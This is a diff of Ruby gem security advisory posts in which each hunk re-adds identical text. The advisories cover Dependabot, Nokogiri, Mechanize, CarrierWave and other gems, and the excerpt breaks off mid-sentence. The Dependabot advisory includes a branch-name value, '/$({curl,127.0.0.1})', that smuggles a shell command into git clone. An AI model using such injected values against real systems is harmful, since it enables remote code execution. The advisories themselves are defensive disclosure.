+    HTTP request smuggling attacks by sending the Content-Length header twice. Furthermore,
+    invalid Transfer Encoding headers were found to be parsed as valid which could be
+    leveraged for TE:CL smuggling attacks.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 2.13.0"
+  related:
+    url:
+    - https://github.com/ohler55/agoo/commit/23d03535cf7b50d679a60a953a0cae9519a4a130
+---
diff --git a/advisories/_posts/2020-11-03-CVE-2020-15240.md b/advisories/_posts/2020-11-03-CVE-2020-15240.md
index 6c14ffbb..0b47a3aa 100644
--- a/advisories/_posts/2020-11-03-CVE-2020-15240.md
+++ b/advisories/_posts/2020-11-03-CVE-2020-15240.md
@@ -1,38 +1,38 @@
----
-layout: advisory
-title: 'CVE-2020-15240 (omniauth-auth0): Regression in JWT Signature Validation'
-comments: false
-categories:
-- omniauth-auth0
-advisory:
-  gem: omniauth-auth0
-  cve: 2020-15240
-  ghsa: 58r4-h6v8-jcvm
-  url: https://github.com/auth0/omniauth-auth0/security/advisories/GHSA-58r4-h6v8-jcvm
-  date: 2020-11-03
-  title: Regression in JWT Signature Validation
-  description: |
-    ### Overview
-    Versions after and including `2.3.0` are improperly validating the JWT token signature when
-    using the `JWTValidator.verify` method.  Improper validation of the JWT token signature when
-    not using the default Authorization Code Flow can allow an attacker to bypass authentication
-    and authorization.
-
-    ### Am I affected?
-    You are affected by this vulnerability if all of the following conditions apply:
-
-    - You are using `omniauth-auth0`.
-    - You are using `JWTValidator.verify` method directly OR you are not authenticating using the
-      SDK’s default Authorization Code Flow.
-
-    ### How to fix that?
-    Upgrade to version `2.4.1`.
-
-    ### Will this update impact my users?
-    The fix provided in this version will not affect your users.
-  cvss_v3: 7.4
-  patched_versions:
-  - ">= 2.4.1"
-  unaffected_versions:
-  - "< 2.3.0"
----
+---
+layout: advisory
+title: 'CVE-2020-15240 (omniauth-auth0): Regression in JWT Signature Validation'
+comments: false
+categories:
+- omniauth-auth0
+advisory:
+  gem: omniauth-auth0
+  cve: 2020-15240
+  ghsa: 58r4-h6v8-jcvm
+  url: https://github.com/auth0/omniauth-auth0/security/advisories/GHSA-58r4-h6v8-jcvm
+  date: 2020-11-03
+  title: Regression in JWT Signature Validation
+  description: |
+    ### Overview
+    Versions after and including `2.3.0` are improperly validating the JWT token signature when
+    using the `JWTValidator.verify` method.  Improper validation of the JWT token signature when
+    not using the default Authorization Code Flow can allow an attacker to bypass authentication
+    and authorization.
+
+    ### Am I affected?
+    You are affected by this vulnerability if all of the following conditions apply:
+
+    - You are using `omniauth-auth0`.
+    - You are using `JWTValidator.verify` method directly OR you are not authenticating using the
+      SDK’s default Authorization Code Flow.
+
+    ### How to fix that?
+    Upgrade to version `2.4.1`.
+
+    ### Will this update impact my users?
+    The fix provided in this version will not affect your users.
+  cvss_v3: 7.4
+  patched_versions:
+  - ">= 2.4.1"
+  unaffected_versions:
+  - "< 2.3.0"
+---
diff --git a/advisories/_posts/2020-11-13-CVE-2020-26222.md b/advisories/_posts/2020-11-13-CVE-2020-26222.md
index 476a7d45..f9c3e803 100644
--- a/advisories/_posts/2020-11-13-CVE-2020-26222.md
+++ b/advisories/_posts/2020-11-13-CVE-2020-26222.md
@@ -1,74 +1,74 @@
----
-layout: advisory
-title: 'CVE-2020-26222 (dependabot-omnibus): Remote code execution in dependabot-core
-  branch names when cloning'
-comments: false
-categories:
-- dependabot-omnibus
-advisory:
-  gem: dependabot-omnibus
-  cve: 2020-26222
-  ghsa: 23f7-99jx-m54r
-  url: https://github.com/dependabot/dependabot-core/security/advisories/GHSA-23f7-99jx-m54r
-  date: 2020-11-13
-  title: Remote code execution in dependabot-core branch names when cloning
-  description: |
-    ### Impact
-    Remote code execution vulnerability in `dependabot-common` and
-    `dependabot-go_modules` when a source branch name contains malicious
-    injectable bash code.
-
-    For example, if Dependabot is configured to use the following source branch
-    name: `"/$({curl,127.0.0.1})"`, Dependabot will make a HTTP request to the
-    following URL: 127.0.0.1 when cloning the source repository.
-
-    When Dependabot is configured to clone the source repository during an update,
-    Dependabot runs a shell command to git clone the repository:
-
-    ```bash
-    git clone --no-tags --no-recurse-submodules --depth=1 --branch=<BRANCH> --single-branch <GITHUB_REPO_URL> repo/contents/path
-    ```
-
-    Dependabot will always clone the source repository for `go_modules` during the
-    file fetching step and can be configured to clone the repository for other
-    package managers using the `FileFetcher` class from `dependabot-common`.
-
-    ```ruby
-    source = Dependabot::Source.new(
-      provider: "github",
-      repo: "repo/name",
-      directory: "/",
-      branch: "/$({curl,127.0.0.1})",
-    )
-
-    repo_contents_path = "./file/path"
-    fetcher = Dependabot::FileFetchers.for_package_manager("bundler").
-                      new(source: source, credentials: [],
-                      repo_contents_path: repo_contents_path)
-    fetcher.clone_repo_contents
-    ```
-
-    ### Workarounds
-    Escape the branch name prior to passing it to the `Dependabot::Source` class.
-
-    For example using `shellwords`:
-
-    ```ruby
-    require "shellwords"
-    branch = Shellwords.escape("/$({curl,127.0.0.1})")
-    source = Dependabot::Source.new(
-      provider: "github",
-      repo: "repo/name",
-      directory: "/",
-      branch: branch,
-    )
-    ```
-  cvss_v3: 8.7
-  patched_versions:
-  - ">= 0.125.1"
-  unaffected_versions:
-  - "< 0.119.0.beta1"
-  related:
-    url:
-    - https://github.com/dependabot/dependabot-core/pull/2727
----
+---
+layout: advisory
+title: 'CVE-2020-26222 (dependabot-omnibus): Remote code execution in dependabot-core
+  branch names when cloning'
+comments: false
+categories:
+- dependabot-omnibus
+advisory:
+  gem: dependabot-omnibus
+  cve: 2020-26222
+  ghsa: 23f7-99jx-m54r
+  url: https://github.com/dependabot/dependabot-core/security/advisories/GHSA-23f7-99jx-m54r
+  date: 2020-11-13
+  title: Remote code execution in dependabot-core branch names when cloning
+  description: |
+    ### Impact
+    Remote code execution vulnerability in `dependabot-common` and
+    `dependabot-go_modules` when a source branch name contains malicious
+    injectable bash code.
+
+    For example, if Dependabot is configured to use the following source branch
+    name: `"/$({curl,127.0.0.1})"`, Dependabot will make a HTTP request to the
+    following URL: 127.0.0.1 when cloning the source repository.
+
+    When Dependabot is configured to clone the source repository during an update,
+    Dependabot runs a shell command to git clone the repository:
+
+    ```bash
+    git clone --no-tags --no-recurse-submodules --depth=1 --branch=<BRANCH> --single-branch <GITHUB_REPO_URL> repo/contents/path
+    ```
+
+    Dependabot will always clone the source repository for `go_modules` during the
+    file fetching step and can be configured to clone the repository for other
+    package managers using the `FileFetcher` class from `dependabot-common`.
+
+    ```ruby
+    source = Dependabot::Source.new(
+      provider: "github",
+      repo: "repo/name",
+      directory: "/",
+      branch: "/$({curl,127.0.0.1})",
+    )
+
+    repo_contents_path = "./file/path"
+    fetcher = Dependabot::FileFetchers.for_package_manager("bundler").
+                      new(source: source, credentials: [],
+                      repo_contents_path: repo_contents_path)
+    fetcher.clone_repo_contents
+    ```
+
+    ### Workarounds
+    Escape the branch name prior to passing it to the `Dependabot::Source` class.
+
+    For example using `shellwords`:
+
+    ```ruby
+    require "shellwords"
+    branch = Shellwords.escape("/$({curl,127.0.0.1})")
+    source = Dependabot::Source.new(
+      provider: "github",
+      repo: "repo/name",
+      directory: "/",
+      branch: branch,
+    )
+    ```
+  cvss_v3: 8.7
+  patched_versions:
+  - ">= 0.125.1"
+  unaffected_versions:
+  - "< 0.119.0.beta1"
+  related:
+    url:
+    - https://github.com/dependabot/dependabot-core/pull/2727
+---
diff --git a/advisories/_posts/2020-11-13-CVE-2020-26223.md b/advisories/_posts/2020-11-13-CVE-2020-26223.md
index 0055859f..5a0ca544 100644
--- a/advisories/_posts/2020-11-13-CVE-2020-26223.md
+++ b/advisories/_posts/2020-11-13-CVE-2020-26223.md
@@ -1,33 +1,33 @@
----
-layout: advisory
-title: 'CVE-2020-26223 (spree_api): Authorization bypass in Spree'
-comments: false
-categories:
-- spree_api
-advisory:
-  gem: spree_api
-  cve: 2020-26223
-  ghsa: m2jr-hmc3-qmpr
-  url: https://github.com/spree/spree/security/advisories/GHSA-m2jr-hmc3-qmpr
-  date: 2020-11-13
-  title: Authorization bypass in Spree
-  description: |
-    ### Impact
-    The perpetrator could query the [API v2 Order Status]
-    (https://guides.spreecommerce.org/api/v2/storefront#tag/Order-Status) endpoint
-    with an empty string passed as an Order token
-
-    ### Patches
-    Please upgrade to 3.7.11, 4.0.4, or 4.1.11 depending on your used Spree version.
-    Users of Spree < 3.7 are not affected.
-  cvss_v3: 7.7
-  patched_versions:
-  - "~> 3.7.11"
-  - "~> 4.0.4"
-  - ">= 4.1.11"
-  unaffected_versions:
-  - "< 3.7.0"
-  related:
-    url:
-    - https://github.com/spree/spree/pull/10573
----
+---
+layout: advisory
+title: 'CVE-2020-26223 (spree_api): Authorization bypass in Spree'
+comments: false
+categories:
+- spree_api
+advisory:
+  gem: spree_api
+  cve: 2020-26223
+  ghsa: m2jr-hmc3-qmpr
+  url: https://github.com/spree/spree/security/advisories/GHSA-m2jr-hmc3-qmpr
+  date: 2020-11-13
+  title: Authorization bypass in Spree
+  description: |
+    ### Impact
+    The perpetrator could query the [API v2 Order Status]
+    (https://guides.spreecommerce.org/api/v2/storefront#tag/Order-Status) endpoint
+    with an empty string passed as an Order token
+
+    ### Patches
+    Please upgrade to 3.7.11, 4.0.4, or 4.1.11 depending on your used Spree version.
+    Users of Spree < 3.7 are not affected.
+  cvss_v3: 7.7
+  patched_versions:
+  - "~> 3.7.11"
+  - "~> 4.0.4"
+  - ">= 4.1.11"
+  unaffected_versions:
+  - "< 3.7.0"
+  related:
+    url:
+    - https://github.com/spree/spree/pull/10573
+---
diff --git a/advisories/_posts/2020-12-08-CVE-2020-26254.md b/advisories/_posts/2020-12-08-CVE-2020-26254.md
index 66bed511..c17d35ec 100644
--- a/advisories/_posts/2020-12-08-CVE-2020-26254.md
+++ b/advisories/_posts/2020-12-08-CVE-2020-26254.md
@@ -1,52 +1,52 @@
----
-layout: advisory
-title: 'CVE-2020-26254 (omniauth-apple): omniauth-apple allows attacker to fake their
-  email address during authentication'
-comments: false
-categories:
-- omniauth-apple
-advisory:
-  gem: omniauth-apple
-  cve: 2020-26254
-  ghsa: 49r3-2549-3633
-  url: https://github.com/nhosoya/omniauth-apple/security/advisories/GHSA-49r3-2549-3633
-  date: 2020-12-08
-  title: omniauth-apple allows attacker to fake their email address during authentication
-  description: |
-    ### Impact
-
-    This vulnerability impacts applications using the [omniauth-apple](https://github.com/nhosoya/omniauth-apple) strategy of OmniAuth and using the `info.email` field of OmniAuth's [Auth Hash Schema](https://github.com/omniauth/omniauth/wiki/Auth-Hash-Schema) for any kind of identification.  The value of this field may be set to any value of the attacker's choice including email addresses of other users.
-
-    For example, an application using omniauth-apple with the following code will be impacted:
-    ```ruby
-    def omniauth_callback
-        auth_hash = request.env['omniauth.auth']
-        @authenticated_user = User.find_by(email: auth_hash.info.email)
-    end
-    ```
-
-    Applications not using `info.email` for identification but are instead using the `uid` field are not impacted in the same manner.  Note, these applications may still be negatively affected if the value of `info.email` is being used for other purposes.
-
-    ### Patches
-
-    Applications using affected versions of omniauth-apple are advised to upgrade to omniauth-apple version 1.0.1 or later.
-
-    ### Workarounds
-
-    If unable to upgrade to a patched version, monkey patching `OmniAuth::Strategies::Apple#email` as follows is advised as a workaround:
-
-    ```ruby
-    module OmniAuth
-      module Strategies
-        class Apple
-          def email
-            id_info['email']
-          end
-        end
-      end
-    end
-    ```
-  cvss_v3: 7.7
-  patched_versions:
-  - ">= 1.0.1"
----
+---
+layout: advisory
+title: 'CVE-2020-26254 (omniauth-apple): omniauth-apple allows attacker to fake their
+  email address during authentication'
+comments: false
+categories:
+- omniauth-apple
+advisory:
+  gem: omniauth-apple
+  cve: 2020-26254
+  ghsa: 49r3-2549-3633
+  url: https://github.com/nhosoya/omniauth-apple/security/advisories/GHSA-49r3-2549-3633
+  date: 2020-12-08
+  title: omniauth-apple allows attacker to fake their email address during authentication
+  description: |
+    ### Impact
+
+    This vulnerability impacts applications using the [omniauth-apple](https://github.com/nhosoya/omniauth-apple) strategy of OmniAuth and using the `info.email` field of OmniAuth's [Auth Hash Schema](https://github.com/omniauth/omniauth/wiki/Auth-Hash-Schema) for any kind of identification.  The value of this field may be set to any value of the attacker's choice including email addresses of other users.
+
+    For example, an application using omniauth-apple with the following code will be impacted:
+    ```ruby
+    def omniauth_callback
+        auth_hash = request.env['omniauth.auth']
+        @authenticated_user = User.find_by(email: auth_hash.info.email)
+    end
+    ```
+
+    Applications not using `info.email` for identification but are instead using the `uid` field are not impacted in the same manner.  Note, these applications may still be negatively affected if the value of `info.email` is being used for other purposes.
+
+    ### Patches
+
+    Applications using affected versions of omniauth-apple are advised to upgrade to omniauth-apple version 1.0.1 or later.
+
+    ### Workarounds
+
+    If unable to upgrade to a patched version, monkey patching `OmniAuth::Strategies::Apple#email` as follows is advised as a workaround:
+
+    ```ruby
+    module OmniAuth
+      module Strategies
+        class Apple
+          def email
+            id_info['email']
+          end
+        end
+      end
+    end
+    ```
+  cvss_v3: 7.7
+  patched_versions:
+  - ">= 1.0.1"
+---
diff --git a/advisories/_posts/2020-12-30-CVE-2020-26247.md b/advisories/_posts/2020-12-30-CVE-2020-26247.md
index 5b1b0893..55821226 100644
--- a/advisories/_posts/2020-12-30-CVE-2020-26247.md
+++ b/advisories/_posts/2020-12-30-CVE-2020-26247.md
@@ -1,75 +1,75 @@
----
-layout: advisory
-title: 'CVE-2020-26247 (nokogiri): Nokogiri::XML::Schema trusts input by default,
-  exposing risk of an XXE vulnerability'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  cve: 2020-26247
-  ghsa: vr8q-g5c7-m54m
-  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-vr8q-g5c7-m54m
-  date: 2020-12-30
-  title: Nokogiri::XML::Schema trusts input by default, exposing risk of an XXE vulnerability
-  description: |
-    ### Description
-
-    In Nokogiri versions <= 1.11.0.rc3, XML Schemas parsed by `Nokogiri::XML::Schema`
-    are **trusted** by default, allowing external resources to be accessed over the
-    network, potentially enabling XXE or SSRF attacks.
-
-    This behavior is counter to
-    the security policy followed by Nokogiri maintainers, which is to treat all input
-    as **untrusted** by default whenever possible.
-
-    Please note that this security
-    fix was pushed into a new minor version, 1.11.x, rather than a patch release to
-    the 1.10.x branch, because it is a breaking change for some schemas and the risk
-    was assessed to be "Low Severity".
-
-    ### Affected Versions
-
-    Nokogiri `<= 1.10.10` as well as prereleases `1.11.0.rc1`, `1.11.0.rc2`, and `1.11.0.rc3`
-
-    ### Mitigation
-
-    There are no known workarounds for affected versions. Upgrade to Nokogiri
-    `1.11.0.rc4` or later.
-
-    If, after upgrading to `1.11.0.rc4` or later, you wish
-    to re-enable network access for resolution of external resources (i.e., return to
-    the previous behavior):
-
-    1. Ensure the input is trusted. Do not enable this option
-    for untrusted input.
-    2. When invoking the `Nokogiri::XML::Schema` constructor,
-    pass as the second parameter an instance of `Nokogiri::XML::ParseOptions` with the
-    `NONET` flag turned off.
-
-    So if your previous code was:
-
-    ``` ruby
-    # in v1.11.0.rc3 and earlier, this call allows resources to be accessed over the network
-    # but in v1.11.0.rc4 and later, this call will disallow network access for external resources
-    schema = Nokogiri::XML::Schema.new(schema)
-
-    # in v1.11.0.rc4 and later, the following is equivalent to the code above
-    # (the second parameter is optional, and this demonstrates its default value)
-    schema = Nokogiri::XML::Schema.new(schema, Nokogiri::XML::ParseOptions::DEFAULT_SCHEMA)
-    ```
-
-    Then you can add the second parameter to indicate that the input is trusted by changing it to:
-
-    ``` ruby
-    # in v1.11.0.rc3 and earlier, this would raise an ArgumentError
-    # but in v1.11.0.rc4 and later, this allows resources to be accessed over the network
-    schema = Nokogiri::XML::Schema.new(trusted_schema, Nokogiri::XML::ParseOptions.new.nononet)
-    ```
-  cvss_v3: 2.6
-  patched_versions:
-  - ">= 1.11.0.rc4"
-  related:
-    url:
-    - https://hackerone.com/reports/747489
----
+---
+layout: advisory
+title: 'CVE-2020-26247 (nokogiri): Nokogiri::XML::Schema trusts input by default,
+  exposing risk of an XXE vulnerability'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  cve: 2020-26247
+  ghsa: vr8q-g5c7-m54m
+  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-vr8q-g5c7-m54m
+  date: 2020-12-30
+  title: Nokogiri::XML::Schema trusts input by default, exposing risk of an XXE vulnerability
+  description: |
+    ### Description
+
+    In Nokogiri versions <= 1.11.0.rc3, XML Schemas parsed by `Nokogiri::XML::Schema`
+    are **trusted** by default, allowing external resources to be accessed over the
+    network, potentially enabling XXE or SSRF attacks.
+
+    This behavior is counter to
+    the security policy followed by Nokogiri maintainers, which is to treat all input
+    as **untrusted** by default whenever possible.
+
+    Please note that this security
+    fix was pushed into a new minor version, 1.11.x, rather than a patch release to
+    the 1.10.x branch, because it is a breaking change for some schemas and the risk
+    was assessed to be "Low Severity".
+
+    ### Affected Versions
+
+    Nokogiri `<= 1.10.10` as well as prereleases `1.11.0.rc1`, `1.11.0.rc2`, and `1.11.0.rc3`
+
+    ### Mitigation
+
+    There are no known workarounds for affected versions. Upgrade to Nokogiri
+    `1.11.0.rc4` or later.
+
+    If, after upgrading to `1.11.0.rc4` or later, you wish
+    to re-enable network access for resolution of external resources (i.e., return to
+    the previous behavior):
+
+    1. Ensure the input is trusted. Do not enable this option
+    for untrusted input.
+    2. When invoking the `Nokogiri::XML::Schema` constructor,
+    pass as the second parameter an instance of `Nokogiri::XML::ParseOptions` with the
+    `NONET` flag turned off.
+
+    So if your previous code was:
+
+    ``` ruby
+    # in v1.11.0.rc3 and earlier, this call allows resources to be accessed over the network
+    # but in v1.11.0.rc4 and later, this call will disallow network access for external resources
+    schema = Nokogiri::XML::Schema.new(schema)
+
+    # in v1.11.0.rc4 and later, the following is equivalent to the code above
+    # (the second parameter is optional, and this demonstrates its default value)
+    schema = Nokogiri::XML::Schema.new(schema, Nokogiri::XML::ParseOptions::DEFAULT_SCHEMA)
+    ```
+
+    Then you can add the second parameter to indicate that the input is trusted by changing it to:
+
+    ``` ruby
+    # in v1.11.0.rc3 and earlier, this would raise an ArgumentError
+    # but in v1.11.0.rc4 and later, this allows resources to be accessed over the network
+    schema = Nokogiri::XML::Schema.new(trusted_schema, Nokogiri::XML::ParseOptions.new.nononet)
+    ```
+  cvss_v3: 2.6
+  patched_versions:
+  - ">= 1.11.0.rc4"
+  related:
+    url:
+    - https://hackerone.com/reports/747489
+---
diff --git a/advisories/_posts/2021-01-11-CVE-2020-26298.md b/advisories/_posts/2021-01-11-CVE-2020-26298.md
index 00dcb8f8..6807bc94 100644
--- a/advisories/_posts/2021-01-11-CVE-2020-26298.md
+++ b/advisories/_posts/2021-01-11-CVE-2020-26298.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2020-26298 (redcarpet): Injection/XSS in Redcarpet'
-comments: false
-categories:
-- redcarpet
-advisory:
-  gem: redcarpet
-  cve: 2020-26298
-  ghsa: q3wr-qw3g-3p4h
-  url: https://github.com/vmg/redcarpet/commit/a699c82292b17c8e6a62e1914d5eccc252272793
-  date: 2021-01-11
-  title: Injection/XSS in Redcarpet
-  description: |
-    Redcarpet is a Ruby library for Markdown processing. In Redcarpet before
-    version 3.5.1, there is an injection vulnerability which can enable a cross-site
-    scripting attack. In affected versions no HTML escaping was being performed when
-    processing quotes. This applies even when the `:escape_html` option was being used.
-  cvss_v3: 6.8
-  patched_versions:
-  - ">= 3.5.1"
-  related:
-    url:
-    - https://github.com/vmg/redcarpet/blob/master/CHANGELOG.md#version-351-security
----
+---
+layout: advisory
+title: 'CVE-2020-26298 (redcarpet): Injection/XSS in Redcarpet'
+comments: false
+categories:
+- redcarpet
+advisory:
+  gem: redcarpet
+  cve: 2020-26298
+  ghsa: q3wr-qw3g-3p4h
+  url: https://github.com/vmg/redcarpet/commit/a699c82292b17c8e6a62e1914d5eccc252272793
+  date: 2021-01-11
+  title: Injection/XSS in Redcarpet
+  description: |
+    Redcarpet is a Ruby library for Markdown processing. In Redcarpet before
+    version 3.5.1, there is an injection vulnerability which can enable a cross-site
+    scripting attack. In affected versions no HTML escaping was being performed when
+    processing quotes. This applies even when the `:escape_html` option was being used.
+  cvss_v3: 6.8
+  patched_versions:
+  - ">= 3.5.1"
+  related:
+    url:
+    - https://github.com/vmg/redcarpet/blob/master/CHANGELOG.md#version-351-security
+---
diff --git a/advisories/_posts/2021-01-26-CVE-2021-26271.md b/advisories/_posts/2021-01-26-CVE-2021-26271.md
index 2fe67df5..22a67576 100644
--- a/advisories/_posts/2021-01-26-CVE-2021-26271.md
+++ b/advisories/_posts/2021-01-26-CVE-2021-26271.md
@@ -1,48 +1,48 @@
----
-layout: advisory
-title: 'CVE-2021-26271 (ckeditor): Regular expression Denial of Service in dialog
-  plugin'
-comments: false
-categories:
-- ckeditor
-advisory:
-  gem: ckeditor
-  cve: 2021-26271
-  ghsa: f6rf-9m92-x2hh
-  url: https://github.com/ckeditor/ckeditor4/blob/master/CHANGES.md#ckeditor-416
-  title: Regular expression Denial of Service in dialog plugin
-  date: 2021-01-26
-  description: |
-    ## Affected packages
-
-    The vulnerability has been discovered and fixed in the [dialog](https://ckeditor.com/cke4/addon/dialog) plugin. Packages indirectly affected by the issue having dialog plugin dependency:
-
-    - [Link](https://ckeditor.com/cke4/addon/link)
-    - [Image](https://ckeditor.com/cke4/addon/image)
-    - [Enhanced Image](https://ckeditor.com/cke4/addon/image2)
-    - [Code Snippet](https://ckeditor.com/cke4/addon/codesnippet)
-    - [Iframe Dialog](https://ckeditor.com/cke4/addon/iframe)
-
-    ## Impact
-
-    A potential vulnerability has been discovered in CKEditor 4 dialog plugin. The vulnerability allowed to abuse a dialog input validator regular expression, which could cause a significant performance drop resulting in a browser tab freeze. It affects all users using the CKEditor 4 plugins listed above at version < 4.18.0.
-
-    ## Patches
-
-    The problem has been recognized and patched. The fix will be available in version 4.18.0.
-
-    ## For more information
-
-    Email us at security@cksource.com if you have any questions or comments about this advisory.
-
-    ## Acknowledgements
-
-    This issue was discovered by the CKEditor 4 team during our regular security audit.
-  patched_versions:
-  - ">= 5.1.2"
-  cvss_v3: 6.5
-  related:
-    url:
-    - https://github.com/ckeditor/ckeditor4/blob/major/CHANGES.md#ckeditor-416
-    - https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-f6rf-9m92-x2hh
----
+---
+layout: advisory
+title: 'CVE-2021-26271 (ckeditor): Regular expression Denial of Service in dialog
+  plugin'
+comments: false
+categories:
+- ckeditor
+advisory:
+  gem: ckeditor
+  cve: 2021-26271
+  ghsa: f6rf-9m92-x2hh
+  url: https://github.com/ckeditor/ckeditor4/blob/master/CHANGES.md#ckeditor-416
+  title: Regular expression Denial of Service in dialog plugin
+  date: 2021-01-26
+  description: |
+    ## Affected packages
+
+    The vulnerability has been discovered and fixed in the [dialog](https://ckeditor.com/cke4/addon/dialog) plugin. Packages indirectly affected by the issue having dialog plugin dependency:
+
+    - [Link](https://ckeditor.com/cke4/addon/link)
+    - [Image](https://ckeditor.com/cke4/addon/image)
+    - [Enhanced Image](https://ckeditor.com/cke4/addon/image2)
+    - [Code Snippet](https://ckeditor.com/cke4/addon/codesnippet)
+    - [Iframe Dialog](https://ckeditor.com/cke4/addon/iframe)
+
+    ## Impact
+
+    A potential vulnerability has been discovered in CKEditor 4 dialog plugin. The vulnerability allowed to abuse a dialog input validator regular expression, which could cause a significant performance drop resulting in a browser tab freeze. It affects all users using the CKEditor 4 plugins listed above at version < 4.18.0.
+
+    ## Patches
+
+    The problem has been recognized and patched. The fix will be available in version 4.18.0.
+
+    ## For more information
+
+    Email us at security@cksource.com if you have any questions or comments about this advisory.
+
+    ## Acknowledgements
+
+    This issue was discovered by the CKEditor 4 team during our regular security audit.
+  patched_versions:
+  - ">= 5.1.2"
+  cvss_v3: 6.5
+  related:
+    url:
+    - https://github.com/ckeditor/ckeditor4/blob/major/CHANGES.md#ckeditor-416
+    - https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-f6rf-9m92-x2hh
+---
diff --git a/advisories/_posts/2021-02-01-CVE-2021-21289.md b/advisories/_posts/2021-02-01-CVE-2021-21289.md
index d30b26a0..1e480cfa 100644
--- a/advisories/_posts/2021-02-01-CVE-2021-21289.md
+++ b/advisories/_posts/2021-02-01-CVE-2021-21289.md
@@ -1,46 +1,46 @@
----
-layout: advisory
-title: 'CVE-2021-21289 (mechanize): Mechanize ruby gem Command Injection vulnerability'
-comments: false
-categories:
-- mechanize
-advisory:
-  gem: mechanize
-  cve: 2021-21289
-  ghsa: qrqm-fpv6-6r8g
-  url: https://github.com/sparklemotion/mechanize/security/advisories/GHSA-qrqm-fpv6-6r8g
-  title: Mechanize ruby gem Command Injection vulnerability
-  date: 2021-02-01
-  description: |
-    ## Impact
-
-    Mechanize `>= v2.0`, `< v2.7.7` allows for OS commands to be injected using several
-    classes' methods which implicitly use Ruby's `Kernel.open` method. Exploitation is
-    possible only if untrusted input is used as a local filename and passed to any of
-    these calls:
-
-    * Mechanize::CookieJar#load: since v2.0 (see 208e3ed)
-    * Mechanize::CookieJar#save_as: since v2.0 (see 5b776a4)
-    * Mechanize#download: since v2.2 (see dc91667)
-    * Mechanize::Download#save and #save! since v2.1 (see 98b2f51, bd62ff0)
-    * Mechanize::File#save and #save_as: since v2.1 (see 2bf7519)
-    * Mechanize::FileResponse#read_body: since v2.0 (see 01039f5)
-
-    ## Patches
-
-    These vulnerabilities are patched in Mechanize v2.7.7.
-
-    ## Workarounds
-
-    No workarounds are available. We recommend upgrading to v2.7.7 or later.
-
-    ## References
-
-    See https://docs.rubocop.org/rubocop/cops_security.html#securityopen for background
-    on why `Kernel.open` should not be used with untrusted input.
-  cvss_v3: 7.4
-  unaffected_versions:
-  - "< 2.0"
-  patched_versions:
-  - ">= 2.7.7"
----
+---
+layout: advisory
+title: 'CVE-2021-21289 (mechanize): Mechanize ruby gem Command Injection vulnerability'
+comments: false
+categories:
+- mechanize
+advisory:
+  gem: mechanize
+  cve: 2021-21289
+  ghsa: qrqm-fpv6-6r8g
+  url: https://github.com/sparklemotion/mechanize/security/advisories/GHSA-qrqm-fpv6-6r8g
+  title: Mechanize ruby gem Command Injection vulnerability
+  date: 2021-02-01
+  description: |
+    ## Impact
+
+    Mechanize `>= v2.0`, `< v2.7.7` allows for OS commands to be injected using several
+    classes' methods which implicitly use Ruby's `Kernel.open` method. Exploitation is
+    possible only if untrusted input is used as a local filename and passed to any of
+    these calls:
+
+    * Mechanize::CookieJar#load: since v2.0 (see 208e3ed)
+    * Mechanize::CookieJar#save_as: since v2.0 (see 5b776a4)
+    * Mechanize#download: since v2.2 (see dc91667)
+    * Mechanize::Download#save and #save! since v2.1 (see 98b2f51, bd62ff0)
+    * Mechanize::File#save and #save_as: since v2.1 (see 2bf7519)
+    * Mechanize::FileResponse#read_body: since v2.0 (see 01039f5)
+
+    ## Patches
+
+    These vulnerabilities are patched in Mechanize v2.7.7.
+
+    ## Workarounds
+
+    No workarounds are available. We recommend upgrading to v2.7.7 or later.
+
+    ## References
+
+    See https://docs.rubocop.org/rubocop/cops_security.html#securityopen for background
+    on why `Kernel.open` should not be used with untrusted input.
+  cvss_v3: 7.4
+  unaffected_versions:
+  - "< 2.0"
+  patched_versions:
+  - ">= 2.7.7"
+---
diff --git a/advisories/_posts/2021-02-08-CVE-2021-21288.md b/advisories/_posts/2021-02-08-CVE-2021-21288.md
index 1ee83451..5a76a7e5 100644
--- a/advisories/_posts/2021-02-08-CVE-2021-21288.md
+++ b/advisories/_posts/2021-02-08-CVE-2021-21288.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2021-21288 (carrierwave): Server-side request forgery in CarrierWave'
-comments: false
-categories:
-- carrierwave
-advisory:
-  gem: carrierwave
-  cve: 2021-21288
-  ghsa: fwcm-636p-68r5
-  url: https://github.com/carrierwaveuploader/carrierwave/security/advisories/GHSA-fwcm-636p-68r5
-  date: 2021-02-08
-  title: Server-side request forgery in CarrierWave
-  description: |
-    ### Impact
-    [CarrierWave download feature](https://github.com/carrierwaveuploader/carrierwave#uploading-files-from-a-remote-location
-    has an SSRF vulnerability, allowing attacks to provide DNS entries or IP addresses that are intended for internal use
-    and gather information about the Intranet infrastructure of the platform.
-
-    ### Patches
-    Upgrade to [2.1.1](https://rubygems.org/gems/carrierwave/versions/2.1.1) or
-    [1.3.2](https://rubygems.org/gems/carrierwave/versions/1.3.2).
-
-    ### Workarounds
-    Using proper network segmentation and applying the principle of least privilege to outbound connections from application
-    servers can reduce the severity of SSRF vulnerabilities. Ideally the vulnerable gem should run on an isolated server
-    without access to any internal network resources or cloud metadata access.
-  cvss_v3: 4.3
-  patched_versions:
-  - "~> 1.3.2"
-  - ">= 2.1.1"
----
+---
+layout: advisory
+title: 'CVE-2021-21288 (carrierwave): Server-side request forgery in CarrierWave'
+comments: false
+categories:
+- carrierwave
+advisory:
+  gem: carrierwave
+  cve: 2021-21288
+  ghsa: fwcm-636p-68r5
+  url: https://github.com/carrierwaveuploader/carrierwave/security/advisories/GHSA-fwcm-636p-68r5
+  date: 2021-02-08
+  title: Server-side request forgery in CarrierWave
+  description: |
+    ### Impact
+    [CarrierWave download feature](https://github.com/carrierwaveuploader/carrierwave#uploading-files-from-a-remote-location
+    has an SSRF vulnerability, allowing attacks to provide DNS entries or IP addresses that are intended for internal use
+    and gather information about the Intranet infrastructure of the platform.
+
+    ### Patches
+    Upgrade to [2.1.1](https://rubygems.org/gems/carrierwave/versions/2.1.1) or
+    [1.3.2](https://rubygems.org/gems/carrierwave/versions/1.3.2).
+
+    ### Workarounds
+    Using proper network segmentation and applying the principle of least privilege to outbound connections from application
+    servers can reduce the severity of SSRF vulnerabilities. Ideally the vulnerable gem should run on an isolated server
